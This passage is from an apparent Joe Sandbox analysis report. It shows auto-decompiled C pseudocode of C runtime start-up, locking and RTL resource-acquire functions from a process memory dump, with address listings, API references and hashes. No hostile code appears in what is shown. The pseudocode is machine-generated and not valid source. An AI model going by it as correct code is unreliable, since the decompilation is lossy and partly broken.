							_t111 =  *_t109;
							if((_t111 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t111 & 0x00000008) != 0) {
								L20:
								_t154 = 0x13c4848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								_t154[1] =  *( *(_t155 - 0x28));
								_t37 =  &(_t154[3]); // 0xd
								E013B40A2(_t37, 0xfa0, 0);
								_t156 = _t156 + 0xc;
								_t154[2] = _t154[2] + 1;
								_t139 =  *(_t155 - 0x20);
								L21:
								_t135 =  *(_t155 - 0x1c);
								goto L22;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							if(_t119 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L28;
				}
				_t86 = E013B2600(_t155, 0x13c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                                        0x013b38a8
                                                        0x013b38aa
                                                        0x013b38af
                                                        0x013b38b6
                                                        0x013b38be
                                                        0x013b38c1
                                                        0x013b38c5
                                                        0x013b38c6
                                                        0x013b38c7
                                                        0x013b38ce
                                                        0x013b38d0
                                                        0x013b38d5
                                                        0x013b38f2
                                                        0x013b38f7
                                                        0x013b38fd
                                                        0x013b3906
                                                        0x013b390c
                                                        0x013b390f
                                                        0x013b3912
                                                        0x013b391b
                                                        0x013b391e
                                                        0x013b3924
                                                        0x013b3927
                                                        0x013b392a
                                                        0x013b392d
                                                        0x013b3930
                                                        0x013b3930
                                                        0x013b393b
                                                        0x013b3946
                                                        0x013b3a7b
                                                        0x013b3a7d
                                                        0x013b3a7e
                                                        0x013b3a7e
                                                        0x013b3a80
                                                        0x013b3a80
                                                        0x013b3a86
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3a91
                                                        0x013b3a97
                                                        0x013b3a9d
                                                        0x013b3ab1
                                                        0x013b3ab7
                                                        0x013b3abe
                                                        0x013b3ac3
                                                        0x013b3ac5
                                                        0x013b3ab9
                                                        0x013b3abb
                                                        0x013b3abb
                                                        0x013b3ac9
                                                        0x013b3acf
                                                        0x013b3ad5
                                                        0x013b3b23
                                                        0x013b3b29
                                                        0x013b3b2c
                                                        0x013b3b2e
                                                        0x013b3b35
                                                        0x013b3b3a
                                                        0x013b3b3a
                                                        0x00000000
                                                        0x013b3adb
                                                        0x013b3adc
                                                        0x013b3ae4
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3ae9
                                                        0x013b3aeb
                                                        0x013b3af3
                                                        0x013b3b00
                                                        0x013b3b0b
                                                        0x013b3b12
                                                        0x013b3b16
                                                        0x013b3b1b
                                                        0x013b3b1e
                                                        0x00000000
                                                        0x013b3b1e
                                                        0x013b3b06
                                                        0x013b3b08
                                                        0x013b3b08
                                                        0x00000000
                                                        0x013b3b08
                                                        0x013b3af9
                                                        0x00000000
                                                        0x013b3af9
                                                        0x013b3aa3
                                                        0x013b3aa9
                                                        0x013b3b3d
                                                        0x013b3b3d
                                                        0x00000000
                                                        0x013b3b3d
                                                        0x013b3a9d
                                                        0x013b3b43
                                                        0x013b3b46
                                                        0x013b3b4b
                                                        0x013b3b4d
                                                        0x013b3b52
                                                        0x013b3b52
                                                        0x013b394c
                                                        0x013b3951
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3957
                                                        0x013b3959
                                                        0x013b395c
                                                        0x013b395f
                                                        0x013b3964
                                                        0x013b396e
                                                        0x013b3970
                                                        0x013b3972
                                                        0x013b3972
                                                        0x013b3977
                                                        0x013b3978
                                                        0x013b397b
                                                        0x013b398d
                                                        0x013b398f
                                                        0x013b3994
                                                        0x013b3a2e
                                                        0x013b3a35
                                                        0x013b3a3b
                                                        0x013b3a4b
                                                        0x013b3a51
                                                        0x013b3a54
                                                        0x013b3a57
                                                        0x013b3a5b
                                                        0x013b3a61
                                                        0x013b3a64
                                                        0x013b3a67
                                                        0x013b3a6a
                                                        0x013b3a6a
                                                        0x013b3a6f
                                                        0x013b3a70
                                                        0x013b3a73
                                                        0x00000000
                                                        0x013b3a73
                                                        0x013b399a
                                                        0x013b39a0
                                                        0x00000000
                                                        0x013b39a0
                                                        0x013b39a3
                                                        0x013b39a5
                                                        0x013b39aa
                                                        0x013b39ab
                                                        0x013b39ae
                                                        0x013b39b1
                                                        0x013b39b9
                                                        0x013b39be
                                                        0x013b3a1b
                                                        0x013b3a1b
                                                        0x013b3a1c
                                                        0x013b3a22
                                                        0x013b3a23
                                                        0x013b3a26
                                                        0x013b3a29
                                                        0x00000000
                                                        0x013b39c4
                                                        0x013b39c4
                                                        0x013b39c8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39cc
                                                        0x013b39dc
                                                        0x013b39e9
                                                        0x013b39f0
                                                        0x013b39f5
                                                        0x013b39fc
                                                        0x013b3a06
                                                        0x013b3a0a
                                                        0x013b3a0f
                                                        0x013b3a12
                                                        0x013b3a15
                                                        0x013b3a18
                                                        0x013b3a18
                                                        0x00000000
                                                        0x013b3a18
                                                        0x013b39cf
                                                        0x013b39d5
                                                        0x013b39da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39da
                                                        0x013b39be
                                                        0x00000000
                                                        0x013b39b1
                                                        0x013b38ea
                                                        0x00000000

                                                        APIs
                                                        • __lock.LIBCMT ref: 013B38B6
                                                          • Part of subcall function 013B442F: __mtinitlocknum.LIBCMT ref: 013B4441
                                                          • Part of subcall function 013B442F: EnterCriticalSection.KERNEL32(00000000,?,013B37AB,0000000D), ref: 013B445A
                                                        • __calloc_crt.LIBCMT ref: 013B38C7
                                                          • Part of subcall function 013B4869: __calloc_impl.LIBCMT ref: 013B4878
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 013B38E2
                                                        • GetStartupInfoW.KERNEL32(?,013C2260,00000064,013B1654,013C2190,00000014), ref: 013B393B
                                                        • __calloc_crt.LIBCMT ref: 013B3986
                                                        • GetFileType.KERNEL32 ref: 013B39CF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2772871689-0
                                                        • Opcode ID: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction ID: 463fd28c463a446911fc3b38428eb700c8d6f8cb2cb158ca4cb62a813851a8ee
                                                        • Opcode Fuzzy Hash: da754f77a62c1b6ce1f50bf49b53589930d17e64e9fb6347d91e4e545bfb3738
                                                        • Instruction Fuzzy Hash: 2881A371D042658EDB24CF68D8C06E9BFF4BF05328B24426DD6A6ABBC1E7359402CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008A0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E008A0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
									_push(_t144);
									_push(0);
									_t51 = L0085F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L008A4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L008B3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008E217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008B3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L008A3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
												_push(_t138);
												_push(0);
												_t58 = L0085F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L008A4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008E217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L008B3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L008A3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00885384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L0085F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L008A3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L0085F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L008A3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L0085F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L008A3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00885329(_t110, _t138);
																_t69 = E008853A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                        0x008a055a
                                                        0x008a055d
                                                        0x008a0563
                                                        0x008a0566
                                                        0x008a05d8
                                                        0x008a05e2
                                                        0x008a05e5
                                                        0x00000000
                                                        0x008a05e7
                                                        0x008a05e7
                                                        0x008a05ea
                                                        0x008a05f3
                                                        0x008a05f3
                                                        0x008a0568
                                                        0x008a0568
                                                        0x008a0568
                                                        0x008a0569
                                                        0x008a0569
                                                        0x008a0569
                                                        0x008a056b
                                                        0x00000000
                                                        0x00000000
                                                        0x008c217f
                                                        0x008c2183
                                                        0x008c225b
                                                        0x008c225f
                                                        0x008c2189
                                                        0x008c218c
                                                        0x008c218f
                                                        0x008c2194
                                                        0x008c2199
                                                        0x008c219d
                                                        0x008c21a0
                                                        0x008c21a2
                                                        0x008c21ce
                                                        0x008c21ce
                                                        0x008c21ce
                                                        0x008c21d0
                                                        0x008c21d6
                                                        0x008c21de
                                                        0x008c21e2
                                                        0x008c21e8
                                                        0x008c21e9
                                                        0x008c21ec
                                                        0x008c21f1
                                                        0x008c21f6
                                                        0x00000000
                                                        0x00000000
                                                        0x008c21f8
                                                        0x008c21fb
                                                        0x008c2206
                                                        0x008c220b
                                                        0x008c220c
                                                        0x008c2217
                                                        0x008c2226
                                                        0x008c222b
                                                        0x008c222c
                                                        0x008c222f
                                                        0x008c2232
                                                        0x008c2235
                                                        0x008c2235
                                                        0x008c223a
                                                        0x008c223f
                                                        0x008c2241
                                                        0x008c2243
                                                        0x008c2248
                                                        0x008c2248
                                                        0x008c224d
                                                        0x008c224f
                                                        0x008c2262
                                                        0x008c2263
                                                        0x008c2268
                                                        0x008c2269
                                                        0x008c2269
                                                        0x008c2269
                                                        0x008c226d
                                                        0x00000000
                                                        0x00000000
                                                        0x008c2276
                                                        0x008c2279
                                                        0x008c227e
                                                        0x008c2283
                                                        0x008c2287
                                                        0x008c228a
                                                        0x008c228d
                                                        0x008c228f
                                                        0x008c22bc
                                                        0x008c22bc
                                                        0x008c22bc
                                                        0x008c22be
                                                        0x008c22c4
                                                        0x008c22cc
                                                        0x008c22d0
                                                        0x008c22d6
                                                        0x008c22d7
                                                        0x008c22da
                                                        0x008c22df
                                                        0x008c22e4
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22e6
                                                        0x008c22e9
                                                        0x008c22f4
                                                        0x008c22f9
                                                        0x008c22fa
                                                        0x008c2305
                                                        0x008c2314
                                                        0x008c2319
                                                        0x008c231a
                                                        0x008c231d
                                                        0x008c2320
                                                        0x008c2323
                                                        0x008c2323
                                                        0x008c2328
                                                        0x008c232d
                                                        0x008c232f
                                                        0x008c2331
                                                        0x008c2336
                                                        0x008c2336
                                                        0x008c233b
                                                        0x008c233d
                                                        0x008c2350
                                                        0x008c2351
                                                        0x008c2356
                                                        0x008c2359
                                                        0x008c2359
                                                        0x008c235b
                                                        0x008c235d
                                                        0x00885367
                                                        0x0088536b
                                                        0x00885372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c2363
                                                        0x008c2363
                                                        0x008c2369
                                                        0x008c236a
                                                        0x008c236c
                                                        0x008c2371
                                                        0x008c2373
                                                        0x00000000
                                                        0x008c2379
                                                        0x008c2379
                                                        0x008c237a
                                                        0x008c237f
                                                        0x008c237f
                                                        0x008c2385
                                                        0x008c2386
                                                        0x008c2389
                                                        0x008c238e
                                                        0x008c2390
                                                        0x00885378
                                                        0x0088537c
                                                        0x008c2396
                                                        0x008c2396
                                                        0x008c2397
                                                        0x008c239c
                                                        0x008c23a2
                                                        0x008c23a3
                                                        0x008c23a6
                                                        0x008c23ab
                                                        0x008c23ad
                                                        0x00000000
                                                        0x008c23b3
                                                        0x008c23b3
                                                        0x008c23b4
                                                        0x008c23b9
                                                        0x008c23ba
                                                        0x008c23ba
                                                        0x008c23bc
                                                        0x008c23bf
                                                        0x00000000
                                                        0x00000000
                                                        0x008b9153
                                                        0x008b9158
                                                        0x008b915a
                                                        0x008b915e
                                                        0x008b9160
                                                        0x00000000
                                                        0x008b9166
                                                        0x008b9166
                                                        0x008b9171
                                                        0x008b9176
                                                        0x008b9176
                                                        0x00000000
                                                        0x008b9160
                                                        0x008c23c6
                                                        0x008c23ce
                                                        0x008c23d7
                                                        0x008c23d7
                                                        0x008c23ad
                                                        0x008c2390
                                                        0x008c2373
                                                        0x008c233f
                                                        0x008c233f
                                                        0x00000000
                                                        0x008c233f
                                                        0x008c2291
                                                        0x008c2291
                                                        0x008c2293
                                                        0x008c2295
                                                        0x008c229a
                                                        0x008c22a1
                                                        0x008c22a3
                                                        0x008c22a7
                                                        0x008c22a9
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22ab
                                                        0x008c22ad
                                                        0x008c22af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22af
                                                        0x008c22b1
                                                        0x008c22b4
                                                        0x008c22b4
                                                        0x008c22b6
                                                        0x008853be
                                                        0x008853be
                                                        0x008853be
                                                        0x008853c0
                                                        0x00000000
                                                        0x00000000
                                                        0x008853cb
                                                        0x008853ce
                                                        0x008853d0
                                                        0x008853d4
                                                        0x008853d6
                                                        0x00000000
                                                        0x008853d8
                                                        0x008853e3
                                                        0x008853ea
                                                        0x008853ea
                                                        0x00000000
                                                        0x008853d6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c22b6
                                                        0x00000000
                                                        0x008c228f
                                                        0x008c2349
                                                        0x008c234d
                                                        0x008c2251
                                                        0x008c2251
                                                        0x00000000
                                                        0x008c2251
                                                        0x008c21a4
                                                        0x008c21a4
                                                        0x008c21a6
                                                        0x008c21a8
                                                        0x008c21ac
                                                        0x008c21b6
                                                        0x008c21b8
                                                        0x008c21bc
                                                        0x008c21be
                                                        0x00000000
                                                        0x00000000
                                                        0x008c21c0
                                                        0x008c21c2
                                                        0x008c21c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c21c4
                                                        0x008c21c6
                                                        0x008c21c6
                                                        0x008c21c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x008c21c8
                                                        0x008c21a2
                                                        0x00000000
                                                        0x008c2183
                                                        0x008a057b
                                                        0x008a057d
                                                        0x008a0581
                                                        0x008a0583
                                                        0x008c2178
                                                        0x00000000
                                                        0x008a0589
                                                        0x008a058f
                                                        0x008a058f
                                                        0x008a0583
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C2206
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-4236105082
                                                        • Opcode ID: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                        • Instruction ID: 9904a52d0e11ce428d9b793c28d47eb6759510b5c8d57c211acc56f2d56a4574
                                                        • Opcode Fuzzy Hash: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                        • Instruction Fuzzy Hash: CB512531B002016BEB15DA18CC82FA673A9FF95720F25822DFD55DB3C6DA75EC418B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B3815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E013B3815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E013B1890(_t3);
				if(E013B4560() != 0) {
					_t6 = E013B4001(E013B35A6);
					 *0x13c350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E013B4869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E013B388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E013B405D( *0x13c350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E013B3762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E013B388B();
					return 0;
				}
			}








                                                        0x013b3815
                                                        0x013b3821
                                                        0x013b3830
                                                        0x013b3835
                                                        0x013b383b
                                                        0x013b383e
                                                        0x00000000
                                                        0x013b3840
                                                        0x013b384d
                                                        0x013b3851
                                                        0x013b3853
                                                        0x013b3882
                                                        0x013b3882
                                                        0x013b3887
                                                        0x013b388a
                                                        0x013b3855
                                                        0x013b3863
                                                        0x013b3865
                                                        0x00000000
                                                        0x013b3867
                                                        0x013b3867
                                                        0x013b3869
                                                        0x013b386a
                                                        0x013b3871
                                                        0x013b3877
                                                        0x013b387b
                                                        0x013b387f
                                                        0x013b3881
                                                        0x013b3881
                                                        0x013b3865
                                                        0x013b3853
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b3823
                                                        0x013b382a
                                                        0x013b382a

                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 013B3815
                                                          • Part of subcall function 013B1890: EncodePointer.KERNEL32(00000000,?,013B381A,013B163A,013C2190,00000014), ref: 013B1893
                                                          • Part of subcall function 013B1890: __initp_misc_winsig.LIBCMT ref: 013B18AE
                                                          • Part of subcall function 013B1890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 013B4117
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 013B412B
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 013B413E
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 013B4151
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 013B4164
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 013B4177
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 013B418A
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 013B419D
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 013B41B0
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 013B41C3
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 013B41D6
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 013B41E9
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 013B41FC
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 013B420F
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 013B4222
                                                          • Part of subcall function 013B1890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 013B4235
                                                        • __mtinitlocks.LIBCMT ref: 013B381A
                                                        • __mtterm.LIBCMT ref: 013B3823
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B447A
                                                          • Part of subcall function 013B388B: _free.LIBCMT ref: 013B4481
                                                          • Part of subcall function 013B388B: DeleteCriticalSection.KERNEL32(013C3558,?,?,013B3828,013B163A,013C2190,00000014), ref: 013B44A3
                                                        • __calloc_crt.LIBCMT ref: 013B3848
                                                        • __initptd.LIBCMT ref: 013B386A
                                                        • GetCurrentThreadId.KERNEL32(013B163A,013C2190,00000014), ref: 013B3871
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1033500166.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000006.00000002.1033491986.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033535506.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033548495.00000000013C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000006.00000002.1033567641.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
